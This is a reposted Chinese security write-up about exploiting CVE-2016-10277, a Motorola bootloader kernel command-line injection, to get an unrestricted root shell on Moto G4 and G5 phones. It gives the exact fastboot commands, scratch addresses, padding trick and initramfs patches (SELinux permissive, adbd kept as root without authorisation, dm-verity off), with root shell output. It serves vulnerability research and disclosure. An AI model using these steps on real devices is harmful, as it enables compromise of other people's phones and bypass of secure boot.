攻击场景还原:本地ROOT Moto G4 & G5设备(附利用代码)

最新推荐文章于 2023-02-16 17:01:56 发布
最新推荐文章于 2023-02-16 17:01:56 发布
阅读量213 收藏 1
点赞数
文章标签: shell 操作系统 移动开发
原文链接:https://yq.aliyun.com/articles/217326
版权
本文讲的是 攻击场景还原:本地ROOT Moto G4 & G5设备(附利用代码)在之前的文章中,我们曾提到CVE-2016-10277可能会影响其他摩托罗拉设备。而在Twitter上收到一些相关的报告之后,我们购买了摩托罗拉的几台设备,并且更新到最新的可用版本以进行此次的测试。 
Moto G4 athene XT1622,运行的系统:NPJS25.93-14.4,bootloader moto-msm8952-B1.05。
Moto G5 cedric XT1676,运行的系统:NPP25.137-33,bootloader moto-msm8937-B8.09。

前文回顾

1、摩托罗拉Android Bootloader(ABOOT)的版本漏洞允许内核命令行注入。

2、我们可以注入一个名为initrd的参数,这使我们能够迫使Linux内核从指定的物理地址来填充initramfs到rootfs。

3、我们可以为了把我们自己的恶意initramfs放置在一个已知的物理地址名为SCRATCH_ADDR(0x11000000适用于Nexus 6)而滥用ABOOT下载功能,。

4、利用此漏洞攻击者可以获得无限制的root shell。

在Moto G4&G5上验证CVE-2016-10277

验证设备确实存在该漏洞的是非常简单的,一个简单的fastboot oem config fsg-id "a androidboot.foo=bar"导致ro.boot.foo创建属性:

$ fastboot oem config fsg-id "a androidboot.foo=bar"
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a androidboot.foo=bar
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>
OKAY [  0.013s]
 
$ fastboot continue
$ adb shell
cedric:/ $ getprop ro.boot.foo
bar
cedric:/ $

这证明了这个参数已被注入到cedric内核命令行中。(有类似的结果athene)

接下来,我们验证了我们可以控制initrd参数,这允许我们强制Linux内核initramfs从指定的物理地址加载。我们运行了fastboot oem config fsg-id "a initrd=0x12345678,1234",并且期望内核崩溃。事实上,它确实崩溃了!

移植到Moto G4&G5

如上所述,在我们利用此漏洞之前,需要解决两个G4&G5具体要求:

1、查找SCRATCH_ADDR引导程序使用的值。
2、创建恶意initramfs档案。

查找SCRATCH_ADDR值

加载athene的和cedric的ABOOTs在IDA中很快显示出了SCRATCH_ADDR:

 
// athene
signed int target_get_scratch_address()
{
  return 0x90000000;
}
 
// cedric
signed int target_get_scratch_address()
{
  return 0xA0100000;
}

验证SCRATCH_ADDR值

在我们进入恶意initramfs创建之前,我们想验证这些SCRATCH_ADDR的值确实是正确的,否则很难确定潜在的问题。而事实也说明了我们的这一计划非常正确,我们将在下面看到结果。

为了验证地址,我们initramfs从摩托罗拉官方固件中的引导映像中提取原始存档。然后,我们利用这个漏洞加载官方initramfs,而不是从SCRATCH_ADDR。

$ fastboot oem config fsg-id "a initrd=0x90000000,1766036"
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0x90000000,1766036
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>
 
OKAY [  0.015s]
finished. total time: 0.015s
 
$ fastboot flash aleph initramfs.cpio.gz
target reported max download size of 536870912 bytes
sending 'aleph' (1725 KB)...
OKAY [  1.088s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.095s
 
$ fastboot continue

显然这不是正常加载,设备也因此进入了无限的引导循环,这让我们感到很困惑。

填充Payload

然后我们进行了大胆的猜测。我们已经意识到,当我们上传initramfs到SCRATCH_ADDR中,之前ABOOT跳跃到Linux内核中,cedric的以及athene的ABOOTs会把一些其他不相关的数据放到SCRATCH_ADDR中,破坏我们的initramfs(但不是全部)。

要想克服这个困难,可以在initramfs之前进行填充数据,并相应地进行initrd调整(到 SCRATCH_ADDR + sizeof(PADDING))。因此,如果我们的假设是真实的,我们将在Linux内核执行之前具有以下内存布局:

 
.--------------------------------.----------------------.
| Physical Address               | Data                 |
|--------------------------------|----------------------|
| SCRATCH_ADDR                   | Corrupted PADDING    |
| SCRATCH_ADDR + sizeof(PADDING) | Controlled initramfs |
`--------------------------------'----------------------'

使用这种技术,通过32MB的padding(0x20000000)都解决了我们的引导循环。

为Moto G4&G5创建initramfs

在Nexus 6的环境下,为了创建一个initramfs来使adb给我们一个无限制的root shell,我们刚刚已经编译了一个AOSP userdebug图像,这样做是因为userdebug 图像拥有可以胜任的su的SELinux域,以及给定一些系统性能的adbd,不是setuid/ setgid到shell,也不放弃自己的能力,不要求授权。 

由于我们没有Moto G4和Moto G5的构建配置,我们决定采取最快的路径,修补官方initramfs档案:

1、通过Patching init,我们已经将SELinux置于permissive模式。结果代码类似于以下内容:

static void selinux_initialize(bool in_kernel_domain) {
[...]
 if (in_kernel_domain) {
[...]
     bool is_enforcing = selinux_is_enforcing();
     security_setenforce(0); // always permissive
[...]
}

2、修补adbd,使其保持为root并且不会降低其功能。(我们用NOPs 替换了相关的电话)。

3、修补adbd,不要求授权。(我们将auth_required全局设置为0)。

4、dm-verity在相关分区上禁用

5、删除了锁定的设备USB策略 init.mmi.usb.sh

6、其他

更新PoC上的可用initroot库。

做完所有这些:成功拿到root shell!

在Moto G4:

 
$ fastboot oem config fsg-id "a initrd=0x92000000,1774281"
$ fastboot flash aleph initroot-athene.cpio.gz
$ fastboot continue
$ adb shell
athene:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
athene:/ # getenforce
Permissive
athene:/ #

在Moto G5上:

$ fastboot flash aleph initroot-cedric.cpio.gz
$ fastboot continue$ adb shell 
cedric:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
cedric:/ # getenforce
Permissive
cedric:/ #



原文发布时间为:2017年6月16日
本文作者:Change
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
weixin_34130389
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
moto 如何解锁BL 以edge s pro为例,保姆级教程
u013382493的博客
12-03 1万+
友情提醒 一旦设备解锁你将面临失去厂家保修的政策;这个是不可逆的;请思虑再三做决定! 一、准备工作 1. 安装好手机adb驱动。 2. 手机上打开”开发者模式“ ;”usb调试“;“oem解锁 ” 选项。 3. 打开“搞机助手”查看手机是否连接成功。(别忘了在手机上授权) 4. 成功连接后使用"搞机助手" 重启至引导模式(手动进入是按住开机键+音量减不放)。 5.确认是否成功进入(引导模式)fastboot模式 二、解锁步骤 1.在cmd命令行输入以下命令;获取设备ID...
Http-Developers::sailboat::sailboat:个人使用基于DockerPHP&JAVA本地开发环境
05-16
MYSQL_DATA_PATH 数据库本地映射目录 JAVA_APPLICATION JAVA项目目录 容器名称列表 MYSQL -> db -> 别名:dev_db PHP -> php -> 别名:dev_php NGINX -> web -> 别名:dev_nginx start.sh 这是写了一个可以快速操作...
攻击场景描述
Jane的私房菜
12-29 1175
作为一个内部攻击者,我要攻击的是一个正在给自己侄女申请留学基金的经理,我可以先制作一个伪装成留学基金申请的钓鱼网站,然后在谈话时无意向其透露这个网站的信息。当这位经理点击网站时,自动盗取他终端内的资料并且对这些资料进行删除或加密。 如果钓鱼网站伪装的足够好,并且在向其透露信息时能引起他的兴趣,那么他就有很大的概率会去访问这个网站。
Fastboot 命令报错分析篇
书山有路勤为径
02-16 3596
如果要刷入的镜像等级比手机的低,是无法刷写的,会出现报错(例如手机未解锁,手机原来刷了 4.4.2,现在刷的却是 4.2 的,抱歉,无法刷入)。常见问题 2、3、8、9、10、11、12、13 等,有可能是数据线、驱动或者电脑问题,或者 AMD 系列 CPU 或主板的问题,不要以为新买的电脑怎么会出问题,我帮机友处理问题遇到此情况,新买的超级本,刷机就是报错,重装了系统也报错,最后没想到换了一台较旧的台式机就好了。如果是老旧设备,请先在 Fastboot 模式下充会儿电,充个 2 小时电满了再刷机。
Fastboot报错总结
PaladinV的逆向学习之路
04-21 1万+
搬运贴,后续再整理,怕以后找不到。 搬自:https://bbs.ixmoe.com/t/topic/17256 常见问题 1:waiting for device 出现现象: 电脑一直提示 waiting for device,等了半个多小时还是没有动静。 原因分析: 这表示未检测到 fastboot 设备。一般都是在没有进入 fastboot 下或者驱动没有正确安装的情况下才会出现此问题。 解决方案: 请确认手机是不是进入了 AP Fastboot 模式,数据线是否是连接好,Motorola 驱动是否正
MOTO G一键解锁Root权限获取教程
wangjia55的专栏
04-24 3619
moto g这款廉价千元机现在国内入手的机友应该还不算多,小编前两天去某宝上晃了一下甚至就连代购都没有的说。好吧,暂时不管我大天朝是否会让moto g开卖,既然机器已经发布,我们就要解锁,就要刷机。很高兴的告诉大家,目前moto g已经能够顺利获取root权限并且解锁bootloader,小编接着就总结一下moto g的解锁和root教程放出来给大家。       和moto x完全
CORS-vulnerable-Lab:样本易受攻击代码及其利用代码
05-05
可以在本地计算机上配置易受攻击代码,以实际利用CORS相关的错误配置问题。 我想对@albinowax(感谢他在CORS开发中的工作),AKReddy和Vivek Sir(感谢始终支持我的杰出人物)和Andrew Sir-@vanderaj(感谢他的...
梯云纵:远程root现代安卓设备.pdf
08-08
【梯云纵:远程root现代安卓设备】 在现代Android设备中,尤其是Google Pixel系列,root权限的获取变得越来越困难。这主要得益于Google在Pixel设备上实施的严格安全措施,包括频繁的系统更新和安全补丁,使得这些...
Root_Box:Lostech Root Box 用于生根支持的 Android 设备
06-21
用于在主要用于 TechniSat 品牌设备的 Android 设备上安装 root 访问权限、SuperUser 和更实际的 BusyBox。 由于这些是基于 Rockchip RK30 的,因此 root 方法可能适用于其他设备。 因此,还包括未知的基于 ...
Android Root利用技术漫谈:绕过PXN.ppt
05-08
360冰刃实验室安全研究员,长期从事于Linux内核驱动的开发和Android内核漏洞的挖掘和利用工作(@spinlock2014) 。 360冰刃实验室Android安全研究员,长期从事于Android内核漏洞的挖掘和利用等研究工作(@jiayy)。 360...
借助内核命令行注入绕过Nexus 6安全引导
weixin_34310369的博客
09-18 274
本文讲的是借助内核命令行注入绕过Nexus 6安全引导,在2017年5月的Android安全公告中,Google发布了一个用于修复CVE- 2016-10277的补丁。 利用此漏洞,攻击者可以对具有ADB/ fastbootUSB访问权限(启动加载程序锁定)的设备进行破坏,允许他获得无限制的root权限,并通过加载篡改或恶意图像来完全拥有用户空间ini...
高通8996启动流程-4. lk启动之boot_linux_from_mmc
HZero
12-11 1044
1.前言 本文档主要对MSM8996的启动流程进行一个简要的分析,目的在于展现启动流程的概貌,不会对每个细节做很详细的表述,但会对启动流程的关键节点进行重点说明。在lk正常启动时会进入boot_linux_from_mmc。 2. boot_linux_from_mmc boot_linux_from_mmc主要完成了bootimg读取到缓存,解压kernel,重定位kernel, ramdisk, dtb,并最终启动kernel,启动的同时会向kernel传递dtb地址,dtb的chosen保存了cmdl
Android 开发之 ---- bootloader (LK)
热门推荐
博学而笃志,切问而近思
03-21 3万+
LK是什么            LK 是 Little Kernel 它是 appsbl (Applications ARM Boot Loader)流程代码  ,little kernel 是小内核小操作系统。            LK 代码 在 bootable/bootloadler/lk 目录下            LK 代码结构            +app
MTK fastboot代码流程
ljj342018214的博客
09-17 2606
一、进fastboot之前 bootloader入口文件为vendor\mediatek\proprietary\bootable\bootloader\lk\arch\arm arch\arm\crt0.S,前面的是一些环境和硬件的初始化,我们直接从kmain:”bl Kmain“开始,该函数位于main.c文件中。 kmain()—>bootstrap2()—>apps_init() void kmain(void) { … 初始化环境的一系列的init thread_t *threa
深入MTK平台bootloader启动之【 lk -> kernel】分析笔记
沉思
11-05 2万+
接上一篇分析: 《深入MTK平台bootloader启动之【 Pre-loader -> Lk】分析笔记》 Pre-loader 运行在ISRAM,待完成 DRAM 的初始化后,再将lk载入DRAM中,最后通过特殊sys call手段实现跳转到lk的执行入口,正式进入lk初始化阶段. 一、lk执行入口: 位于.text.boot 这个section(段),具体定义位置
Android Bootloader LittleKernel的两篇文章 【转】
weixin_34187822的博客
11-18 133
转自:http://blog.csdn.net/loongembedded/article/details/41747523 2014-12-05 14:37 3599人阅读 评论(2) 收藏 举报 分类: Android Bootloader(68) Android 开发之 ---- bootloader (LK) LK是...
cpp代码TreeNode*& root和TreeNode&* root有什么不同?
最新发布
06-03
`TreeNode*& root` 和 `TreeNode&* root` 都是指针的引用,但是它们的含义不同。 `TreeNode*& root` 是指向指针的引用,意味着可以通过该引用修改指针本身所指向的内存地址。例如,如果你传递一个指针的引用 `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值